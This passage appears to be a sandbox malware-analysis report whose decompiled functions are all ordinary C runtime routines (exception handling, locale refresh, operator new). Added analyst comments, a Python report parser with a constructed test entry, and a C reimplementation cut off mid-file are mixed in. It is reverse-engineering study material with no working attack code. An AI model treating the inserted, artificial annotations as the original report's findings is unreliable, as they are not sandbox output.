                                                                                                            							 *(E00A33F5E(__ebx, __edx, __edi, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
                                                                                                            							_push(8);
                                                                                                            							_push(0xa3b678);
                                                                                                            							E00A34440(_t23, _t26, __esi);
                                                                                                            							_t19 =  *((intOrPtr*)(E00A33F5E(_t23, __edx, _t26, _t32) + 0x78));
                                                                                                            							if(_t19 != 0) {
                                                                                                            								_v8 = _v8 & 0x00000000;
                                                                                                            								 *_t19();
                                                                                                            								_v8 = 0xfffffffe;
                                                                                                            							}
                                                                                                            							return E00A34485(E00A35372(_t23, _t25, _t26, _t27));
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • __getptd.LIBCMT ref: 00A3786E
                                                                                                              • Part of subcall function 00A33F5E: __getptd_noexit.LIBCMT ref: 00A33F61
                                                                                                              • Part of subcall function 00A33F5E: __amsg_exit.LIBCMT ref: 00A33F6E
                                                                                                            • __getptd.LIBCMT ref: 00A3787F
                                                                                                            • __getptd.LIBCMT ref: 00A3788D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                            • String ID: MOC$RCC$csm
                                                                                                            • API String ID: 803148776-2671469338
                                                                                                            • Opcode ID: 08023554eef41aad810a177e4eb83e4040c19767ddd1b36da22133d8c48aeee6
                                                                                                            • Instruction ID: b0de9f32178387dca43d910d3e40f9972ebae82e56ea98171fdbebe0a040aa0f
                                                                                                            • Opcode Fuzzy Hash: 08023554eef41aad810a177e4eb83e4040c19767ddd1b36da22133d8c48aeee6
                                                                                                            • Instruction Fuzzy Hash: C8E012765181489FDB309B69C24E7AC32A4EB95318F5545A1F41DCB232C725D990D542
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 89%
                                                                                                            			E00A37AFF(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				intOrPtr _t48;
                                                                                                            				void* _t53;
                                                                                                            				intOrPtr _t57;
                                                                                                            				void* _t58;
                                                                                                            				void* _t61;
                                                                                                            
                                                                                                            				_t61 = __eflags;
                                                                                                            				_push(0x2c);
                                                                                                            				_push(0xa3ba68);
                                                                                                            				E00A34440(__ebx, __edi, __esi);
                                                                                                            				_t48 = __ecx;
                                                                                                            				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                                                                                                            				_t57 =  *((intOrPtr*)(_t58 + 8));
                                                                                                            				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                                                                                                            				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                                                                                                            				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                                                                                                            				 *((intOrPtr*)(_t58 - 0x28)) = E00A376B7(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                                                                                                            				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00A33F5E(__ecx, _t53, _t55, _t61) + 0x88));
				/* Tail of E00A37AFF. From the API list below: E00A33F5E is __getptd (per-thread data),
				   E00A3775C is the _CallCatchBlock2 body that invokes the handler via __CallSettingFrame@12,
				   E00A37C25 tears the frame info down again, E00A34485 is the __SEH_epilog4 of the
				   __SEH_prolog4/__SEH_epilog4 pair. [ebp-4] is the SEH4 scope index (0 = inside __try, -2 = out). */
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00A33F5E(_t48, _t53, _t55, _t61) + 0x8c));   /* save ptd+0x8c */
				 *((intOrPtr*)(E00A33F5E(_t48, _t53, _t55, _t61) + 0x88)) = _t57;                              /* ptd+0x88 = _t57 */
				 *((intOrPtr*)(E00A33F5E(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));     /* ptd+0x8c = arg at ebp+0x10 */
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;   /* enter __try */
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00A3775C(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));   /* run the catch handler; result = continuation address */
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;                  /* leave __try */
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E00A37C25(_t48, _t53, _t55, _t57, _t61);    /* restore the saved per-thread fields */
				return E00A34485( *((intOrPtr*)(_t58 - 0x1c)));
			}

Instruction addresses (per-line address column of the listing above): 0x00a37aff to 0x00a37c19

                                                                                                            APIs
                                                                                                            • __CreateFrameInfo.LIBCMT ref: 00A37B27
                                                                                                              • Part of subcall function 00A376B7: __getptd.LIBCMT ref: 00A376C5
                                                                                                              • Part of subcall function 00A376B7: __getptd.LIBCMT ref: 00A376D3
                                                                                                            • __getptd.LIBCMT ref: 00A37B31
                                                                                                              • Part of subcall function 00A33F5E: __getptd_noexit.LIBCMT ref: 00A33F61
                                                                                                              • Part of subcall function 00A33F5E: __amsg_exit.LIBCMT ref: 00A33F6E
                                                                                                            • __getptd.LIBCMT ref: 00A37B3F
                                                                                                            • __getptd.LIBCMT ref: 00A37B4D
                                                                                                            • __getptd.LIBCMT ref: 00A37B58
                                                                                                            • _CallCatchBlock2.LIBCMT ref: 00A37B7E
                                                                                                              • Part of subcall function 00A3775C: __CallSettingFrame@12.LIBCMT ref: 00A377A8
                                                                                                              • Part of subcall function 00A37C25: __getptd.LIBCMT ref: 00A37C34
                                                                                                              • Part of subcall function 00A37C25: __getptd.LIBCMT ref: 00A37C42
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
• Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 1602911419-0
                                                                                                            • Opcode ID: 3830e614d59b6e2674472a543bd7a4f0ec336fecf3281ec53f9c554f632463ce
                                                                                                            • Instruction ID: 813888431e98786929e09e74d3f0a1a0b419cf1c8cce8971ea4ea58aea3dd8c6
                                                                                                            • Opcode Fuzzy Hash: 3830e614d59b6e2674472a543bd7a4f0ec336fecf3281ec53f9c554f632463ce
                                                                                                            • Instruction Fuzzy Hash: 4911C9B1C052099FDF10EFA4D646BED77B0FF08314F108469F818AB251DB399A159B54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 82%
			/* Shape of the MSVC CRT's per-thread locale/mbcinfo refresh (__updatetmbcinfo-style):
			   if the thread does not own its locale (ptd+0x70 & __globallocalestatus, whose initial
			   value ~1 = 0xfffffffe is what the decompiler shows at 0xa3db20) or has none yet, take
			   lock 0xd, drop the reference on the old info block, free it unless it is the static
			   initial block, and point the thread at the global block. E00A33F5E is __getptd,
			   E00A338F2 is __lock, E00A3352B is _free, E00A32EDA is __amsg_exit (see APIs below). */
			E00A35D96(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;   /* frame pointer (ebp); the decompiler never assigns it */
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);          /* __SEH_prolog4 pattern: locals size, then scope table */
				_push(0xa3b768);
				E00A34440(__ebx, __edi, __esi);
				_t31 = E00A33F5E(__ebx, __edx, __edi, _t35);   /* ptd = __getptd() */
				_t15 =  *0xa3db20; // 0xfffffffe  (__globallocalestatus)
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {   /* thread uses the global locale, or has none */
					E00A338F2(_t25, 0xd);                       /* __lock(0xd) */
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;   /* enter __try */
					_t33 =  *(_t31 + 0x68);                     /* current info block; its first field is the refcount */
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xa3da18; // 0x2531600  (global info block)
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);   /* release the old reference */
							if(__eflags == 0) {
								__eflags = _t33 - 0xa3d5f0;          /* the static initial block is never freed */
								if(__eflags != 0) {
									E00A3352B(_t33);                 /* _free(old block) */
								}
							}
						}
						_t21 =  *0xa3da18; // 0x2531600
						 *(_t31 + 0x68) = _t21;                  /* adopt the global block ... */
						_t33 =  *0xa3da18; // 0x2531600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);              /* ... and take a reference on it */
					}
					 *(_t34 - 4) = 0xfffffffe;   /* leave __try */
					E00A35E31();                 /* __finally: release lock 0xd */
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);                 /* __amsg_exit(0x20): R6032, not enough space for locale information */
					E00A32EDA(_t29, _t31, _t33, _t38);
				}
				return E00A34485(_t33);          /* __SEH_epilog4; returns the info block */
			}

Instruction addresses (per-line address column of the listing above): 0x00a35d96 to 0x00a35e27; the trailing 0x00a35db9 to 0x00a35dcf entries are the else branch and the exit path

                                                                                                            APIs
                                                                                                            • __getptd.LIBCMT ref: 00A35DA2
                                                                                                              • Part of subcall function 00A33F5E: __getptd_noexit.LIBCMT ref: 00A33F61
                                                                                                              • Part of subcall function 00A33F5E: __amsg_exit.LIBCMT ref: 00A33F6E
                                                                                                            • __amsg_exit.LIBCMT ref: 00A35DC2
                                                                                                            • __lock.LIBCMT ref: 00A35DD2
                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00A35DEF
                                                                                                            • _free.LIBCMT ref: 00A35E02
                                                                                                            • InterlockedIncrement.KERNEL32(02531600), ref: 00A35E1A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
• Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3470314060-0
                                                                                                            • Opcode ID: a7c04c2bee6d49618e3e485d13741eba4e3204ed292af660c6423cf9b941ce8f
                                                                                                            • Instruction ID: 6404d0c269152a86c12c9f06637e68883077c2692b1c34467acb0f664d8b3956
                                                                                                            • Opcode Fuzzy Hash: a7c04c2bee6d49618e3e485d13741eba4e3204ed292af660c6423cf9b941ce8f
                                                                                                            • Instruction Fuzzy Hash: B0019232D05B11EBDB10EF7DAA0675EB7A0BF04751F254019F400A7290C734AA42CBD1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%
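The per-function entries in this report (function address, C-code quality, API references with their "Part of subcall function" ancestry, memory-dump source and image offset, instruction fuzzy hash) follow a fixed text layout, and most of the functions in this dump are CRT and exception-handling plumbing that an analyst wants to skip. The following Python is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses such entries and triages each function as CRT-internal or worth review. The test input is the E00A35D96 entry copied from above plus one hypothetical entry (the address E00A3F000 and its CreateProcessW reference are constructed for the test, not from this report); the BENIGN_WIN32 allowlist and the triage rule are my own heuristic, and the regular expressions assume the bullet layout shown on this page.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed test input: the E00A35D96 entry as printed in the report above, followed by
# a hypothetical entry (address and API refs made up for this example, not from the report).
SAMPLE_REPORT = """\
C-Code - Quality: 82%
E00A35D96(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    return E00A34485(_t33);
}
APIs
• __getptd.LIBCMT ref: 00A35DA2
  • Part of subcall function 00A33F5E: __getptd_noexit.LIBCMT ref: 00A33F61
  • Part of subcall function 00A33F5E: __amsg_exit.LIBCMT ref: 00A33F6E
• __amsg_exit.LIBCMT ref: 00A35DC2
• __lock.LIBCMT ref: 00A35DD2
• InterlockedDecrement.KERNEL32(?), ref: 00A35DEF
• _free.LIBCMT ref: 00A35E02
• InterlockedIncrement.KERNEL32(02531600), ref: 00A35E1A
Memory Dump Source
• Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
• Instruction Fuzzy Hash: B0019232D05B11EBDB10EF7DAA0675EB7A0BF04751F254019F400A7290C734AA42CBD1
C-Code - Quality: 50%
E00A3F000(void* __ecx) {
}
APIs
• __getptd.LIBCMT ref: 00A3F010
• CreateProcessW.KERNEL32(?,?,?,?,?,00000004), ref: 00A3F020
Memory Dump Source
• Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
"""


@dataclass
class ApiRef:
    name: str
    lib: str
    ref: int                       # address of the call site
    args: Optional[str] = None     # argument string the sandbox recorded, if any
    subcall: Optional[int] = None  # callee address when the ref is "Part of subcall function"


@dataclass
class FunctionEntry:
    address: int
    quality: Optional[int] = None
    apis: List[ApiRef] = field(default_factory=list)
    dump_file: Optional[str] = None
    image_base: Optional[int] = None
    fuzzy_hash: Optional[str] = None

    @property
    def direct_apis(self) -> List[ApiRef]:
        return [a for a in self.apis if a.subcall is None]

    @property
    def rva(self) -> Optional[int]:
        # Offset in the "Memory Dump Source" line is the image base the dump was taken at,
        # so address - base is the RVA to look up in the on-disk PE.
        return None if self.image_base is None else self.address - self.image_base


_QUAL_RE = re.compile(r"C-Code - Quality:\s*(\d+)%")
_FUNC_RE = re.compile(r"^\s*E([0-9A-Fa-f]{8})\(")
_API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
                     r"([\w@]+)\.([A-Za-z0-9]+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")
_DUMP_RE = re.compile(r"Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+)")
_HASH_RE = re.compile(r"Instruction Fuzzy Hash:\s*([0-9A-Fa-f]+)")


def parse_report(text: str) -> List[FunctionEntry]:
    """Split the report text into one FunctionEntry per 'C-Code - Quality' block."""
    entries: List[FunctionEntry] = []
    pending_quality: Optional[int] = None
    cur: Optional[FunctionEntry] = None
    for line in text.splitlines():
        m = _QUAL_RE.search(line)
        if m:
            pending_quality = int(m.group(1))
            continue
        m = _FUNC_RE.match(line)
        # Only the line right after the quality banner is a function header; bare
        # E00A....( lines inside a body are calls, not new functions.
        if m and pending_quality is not None:
            cur = FunctionEntry(address=int(m.group(1), 16), quality=pending_quality)
            entries.append(cur)
            pending_quality = None
            continue
        if cur is None:
            continue
        m = _API_RE.match(line)
        if m:
            sub, name, lib, args, ref = m.groups()
            cur.apis.append(ApiRef(name, lib, int(ref, 16), args, int(sub, 16) if sub else None))
            continue
        m = _DUMP_RE.search(line)
        if m:
            cur.dump_file, cur.image_base = m.group(1), int(m.group(2), 16)
            continue
        m = _HASH_RE.search(line)
        if m:
            cur.fuzzy_hash = m.group(1)
    return entries


# Win32 helpers the CRT itself calls; seeing only these next to LIBCMT internals is not
# interesting. Heuristic allowlist chosen for this example, extend to taste.
BENIGN_WIN32 = {"InterlockedIncrement", "InterlockedDecrement", "InterlockedExchange",
                "GetLastError", "SetLastError", "TlsGetValue", "TlsSetValue"}


def triage(entry: FunctionEntry) -> str:
    """'crt-internal' when every direct ref is a LIBCMT internal or a benign Win32 helper,
    'no-api-refs' when the sandbox recorded nothing, otherwise 'review'."""
    if not entry.apis:
        return "no-api-refs"
    non_crt = [a for a in entry.direct_apis if a.lib.upper() != "LIBCMT"]
    if all(a.name in BENIGN_WIN32 for a in non_crt):
        return "crt-internal"
    return "review"


def summarize(entries: List[FunctionEntry]) -> List[Tuple[str, Optional[int], Optional[int], int, str]]:
    return [(f"{e.address:08X}", e.rva, e.quality, len(e.direct_apis), triage(e)) for e in entries]


if __name__ == "__main__":
    for addr, rva, quality, n_direct, verdict in summarize(parse_report(SAMPLE_REPORT)):
        print(f"{addr} rva=0x{rva:X} quality={quality}% direct_apis={n_direct} -> {verdict}")
```

Feed it the text of the whole "Execution Graph" section and sort by verdict: the `review` rows are the functions that call beyond the CRT, and `rva` lets you find the same function in the dropped PE rather than in the dump.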

                                                                                                            C-Code - Quality: 28%
			/* Quality 28%: the decompiler recovered no argument types. The call sequence and the
			   field offsets are those of the MSVC C++ EH runtime's CatchIt(): ebx = catch handler
			   entry (HandlerType*), esi = this frame's registration node, edi = try-block map entry,
			   _a4 = exception record, _a8 = context, _a12 = dispatcher context, _a16 = FuncInfo,
			   _a20 = catchable type (conversion, may be NULL), _a24 = catch depth, _a28 = marker node. */
			E00A37EAC(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				intOrPtr* _t14;   /* _t14, _t30 and _t31 were left undeclared by the decompiler */
				void* _t30;
				void* _t31;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {          /* a catchable type exists: construct the catch object */
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E00A37E1A(__ebx, __edi, __esi, _t30);   /* BuildCatchObject(pExcept, pRN, pCatch, pConv) */
					_t28 = _t28 + 0x10;                      /* cdecl: caller pops the four arguments */
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E00A37411(_t23);         /* _UnwindNestedFrames(pMarkerRN ? pMarkerRN : pRN, pExcept) */
				_push( *_t26);           /* tryLow of the try-block map entry */
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E00A3789C(_t22, _t23, _t25, _t26, _t27, _t31);   /* FrameUnwindToState(pRN, pDC, pFuncInfo, tryLow) */
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;   /* pRN->state = tryHigh + 1 */
				_push(_a8);
				_t14 = _t22 + 0xc; // 0x6e   (HandlerType+0xc: address of the catch handler)
				_push(_t27);
				_push(_a4);
				_t20 = E00A37AFF(_t22,  *_t14, _t26, _t27, _t31);   /* CallCatchBlock(...): runs the handler, returns the continuation address */
				if(_t20 != 0) {
					E00A373D8(_t20, _t27);   /* _JumpToContinuation(addr, pRN): does not return */
					return _t20;
				}
				return _t20;
			}

Instruction addresses (per-line address column of the listing above): 0x00a37eac to 0x00a37ee3 (the column is cut off here)
                                                                                                            0x00a37ee4
                                                                                                            0x00a37eec
                                                                                                            0x00a37ef1
                                                                                                            0x00a37ef5
                                                                                                            0x00a37ef8
                                                                                                            0x00a37efb
                                                                                                            0x00a37efe
                                                                                                            0x00a37f01
                                                                                                            0x00a37f02
                                                                                                            0x00a37f05
                                                                                                            0x00a37f0f
                                                                                                            0x00a37f13
                                                                                                            0x00000000
                                                                                                            0x00a37f13
                                                                                                            0x00a37f19

                                                                                                            APIs
                                                                                                            • ___BuildCatchObject.LIBCMT ref: 00A37EBF
                                                                                                              • Part of subcall function 00A37E1A: ___BuildCatchObjectHelper.LIBCMT ref: 00A37E50
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00A37ED6
                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 00A37EE4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                             • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
                                                                                                             • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
                                                                                                             • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
                                                                                                             • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                            • String ID: csm$csm
                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                            • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                            • Instruction ID: b3af6bb7ed97af017687b0238a92cc8cbf5e049b1f9e2b37622711546a074322
                                                                                                            • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                            • Instruction Fuzzy Hash: 3701E4B1405209BBDF22AF51CD45EAF7F6AEF08390F104454FD1815161D776A9B1EBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 52%
                                                                                                            			E00A32EF8(void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                            				intOrPtr _v0;
                                                                                                            				char* _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				char _v20;
                                                                                                            				intOrPtr _v28;
                                                                                                            				void* _t20;
                                                                                                            				signed int _t21;
                                                                                                            				intOrPtr _t25;
                                                                                                            				signed int _t27;
                                                                                                            				void* _t33;
                                                                                                            				void* _t34;
                                                                                                            				void* _t35;
                                                                                                            				signed int _t36;
                                                                                                            				void* _t40;
                                                                                                            				intOrPtr _t41;
                                                                                                            				void* _t43;
                                                                                                            				char* _t46;
                                                                                                            				void* _t54;
                                                                                                            				void* _t55;
                                                                                                            				signed int _t59;
                                                                                                            				intOrPtr* _t60;
                                                                                                            				void* _t62;
                                                                                                            				intOrPtr* _t64;
                                                                                                            				intOrPtr* _t65;
                                                                                                            				void* _t68;
                                                                                                            
                                                                                                            				_t62 = __esi;
                                                                                                            				_t55 = __edi;
                                                                                                             				// Analyst note: this loop is the MSVC CRT operator new(size_t). E00A33403 is malloc,
                                                                                                             				// E00A33D86 is _callnewh (invoke the new-handler, nonzero = retry). When both fail, the
                                                                                                             				// block below builds the static std::bad_alloc ("bad allocation") once, registers its
                                                                                                             				// destructor with atexit (E00A3309B), copy-constructs it and throws via E00A33252.
                                                                                                             				while(1) {
                                                                                                            					_t20 = E00A33403(_t54, _t55, _t62, _a4);
                                                                                                            					if(_t20 != 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_t21 = E00A33D86(_t20, _a4);
                                                                                                            					__eflags = _t21;
                                                                                                            					if(_t21 == 0) {
                                                                                                            						__eflags =  *0xa3dcc0 & 0x00000001;
                                                                                                            						if(( *0xa3dcc0 & 0x00000001) == 0) {
                                                                                                            							 *0xa3dcc0 =  *0xa3dcc0 | 0x00000001;
                                                                                                            							__eflags =  *0xa3dcc0;
                                                                                                            							_push(1);
                                                                                                            							_v8 = "bad allocation";
                                                                                                            							E00A32710(0xa3dcb4,  &_v8);
                                                                                                            							 *0xa3dcb4 = 0xa391f4;
                                                                                                            							E00A3309B( *0xa3dcc0, 0xa3882e);
                                                                                                            						}
                                                                                                            						_t46 =  &_v20;
                                                                                                            						E00A32826(_t46, 0xa3dcb4);
                                                                                                            						_v20 = 0xa391f4;
                                                                                                            						E00A33252( &_v20, 0xa3b7e8);
                                                                                                             						asm("int3");
                                                                                                             						// Analyst note: the throw above never returns, so everything from here on is the
                                                                                                             						// decompiler reading past the int3 padding into the next CRT routine, __onexit:
                                                                                                             						// DecodePointer the table bounds (*0xa3ea74 / *0xa3ea70), grow the table by
                                                                                                             						// min(_msize, 0x800) bytes with a 0x10-byte fallback, store the EncodePointer'd
                                                                                                             						// entry. _v0 is that routine's function argument, not operator new's size.
                                                                                                            						_t64 = __imp__DecodePointer;
                                                                                                            						_t25 =  *_t64( *0xa3ea74, 0xa3dcb4, 0xa391f4, _t40, _t46, _t68);
                                                                                                            						_t41 = _t25;
                                                                                                            						_v28 = _t41;
                                                                                                            						_t65 =  *_t64( *0xa3ea70);
                                                                                                            						__eflags = _t65 - _t41;
                                                                                                            						if(_t65 < _t41) {
                                                                                                            							L18:
                                                                                                            							_t27 = 0;
                                                                                                            							__eflags = 0;
                                                                                                            						} else {
                                                                                                            							_t59 = _t65 - _t41;
                                                                                                            							_t11 = _t59 + 4; // 0x4
                                                                                                            							__eflags = _t11 - 4;
                                                                                                            							if(_t11 < 4) {
                                                                                                            								goto L18;
                                                                                                            							} else {
                                                                                                            								_t43 = E00A3491C(_t41);
                                                                                                            								_t12 = _t59 + 4; // 0x4
                                                                                                            								__eflags = _t43 - _t12;
                                                                                                            								if(_t43 >= _t12) {
                                                                                                            									L17:
                                                                                                            									_t60 = __imp__EncodePointer;
                                                                                                            									 *_t65 =  *_t60(_v0);
                                                                                                            									 *0xa3ea70 =  *_t60(_t65 + 4);
                                                                                                            									_t27 = _v0;
                                                                                                            								} else {
                                                                                                            									_t33 = 0x800;
                                                                                                            									__eflags = _t43 - 0x800;
                                                                                                            									if(_t43 < 0x800) {
                                                                                                            										_t33 = _t43;
                                                                                                            									}
                                                                                                            									_t34 = _t33 + _t43;
                                                                                                            									__eflags = _t34 - _t43;
                                                                                                            									if(_t34 < _t43) {
                                                                                                            										L14:
                                                                                                            										_t14 = _t43 + 0x10; // 0x10
                                                                                                            										_t35 = _t14;
                                                                                                            										__eflags = _t35 - _t43;
                                                                                                            										if(_t35 < _t43) {
                                                                                                            											goto L18;
                                                                                                            										} else {
                                                                                                            											_t36 = E00A348CE(_v12, _t35);
                                                                                                            											__eflags = _t36;
                                                                                                            											if(_t36 == 0) {
                                                                                                            												goto L18;
                                                                                                            											} else {
                                                                                                            												goto L16;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										_t36 = E00A348CE(_v12, _t34);
                                                                                                            										__eflags = _t36;
                                                                                                            										if(_t36 != 0) {
                                                                                                            											L16:
                                                                                                            											_t65 = _t36 + (_t59 >> 2) * 4;
                                                                                                            											__imp__EncodePointer(_t36);
                                                                                                            											 *0xa3ea74 = _t36;
                                                                                                            											goto L17;
                                                                                                            										} else {
                                                                                                            											goto L14;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						return _t27;
                                                                                                            					} else {
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					L20:
                                                                                                            				}
                                                                                                            				return _t20;
                                                                                                            				goto L20;
                                                                                                            			}
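The listing above is far easier to triage once it is recognised as C runtime code rather than the sample's own logic. The following C is an added illustration, not code from the report or from the sample: it reimplements the two MSVC CRT routines the decompiler merged into E00A32EF8, the operator new retry loop (E00A33403 as malloc, E00A33D86 as _callnewh, the static "bad allocation" std::bad_alloc built once and then thrown) and, past the int3, the __onexit registration table whose bounds are kept behind DecodePointer/EncodePointer and which grows by min(size, 0x800) bytes with a 0x10-byte fallback. The fixed XOR cookie that stands in for the per-process pointer-encoding secret, the injectable allocator, the retry handler and the callbacks are all constructed for this example and are not part of the analysed binary.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Added illustration (not from the sample or the report): readable C for the
 * two CRT routines merged in E00A32EF8. The XOR cookie replacing
 * EncodePointer/DecodePointer and the injectable allocator are assumptions. */

/* ---- Part 1: operator new retry loop (everything before the int3) ---- */

typedef int (*new_handler_t)(size_t);      /* like _PNH: nonzero means "retry" */
static new_handler_t g_new_handler = NULL; /* what E00A33D86 (_callnewh) consults */
static int g_bad_alloc_count = 0;          /* times the "bad allocation" throw path ran */

void crt_set_new_handler(new_handler_t h) { g_new_handler = h; }
int  crt_bad_alloc_count(void) { return g_bad_alloc_count; }

void *crt_operator_new(size_t size, void *(*alloc_fn)(size_t))
{
    void *p;
    while ((p = alloc_fn(size)) == NULL) {                 /* E00A33403: malloc */
        if (g_new_handler == NULL || !g_new_handler(size)) {
            g_bad_alloc_count++;   /* listing: build static std::bad_alloc, throw a copy */
            return NULL;
        }
    }
    return p;
}

/* Constructed test doubles: an allocator that fails n times, a handler allowing n retries. */
static int g_fail_allocs = 0, g_retries_left = 0;
void  set_failing_allocs(int n) { g_fail_allocs = n; }
void  set_retries(int n)        { g_retries_left = n; }
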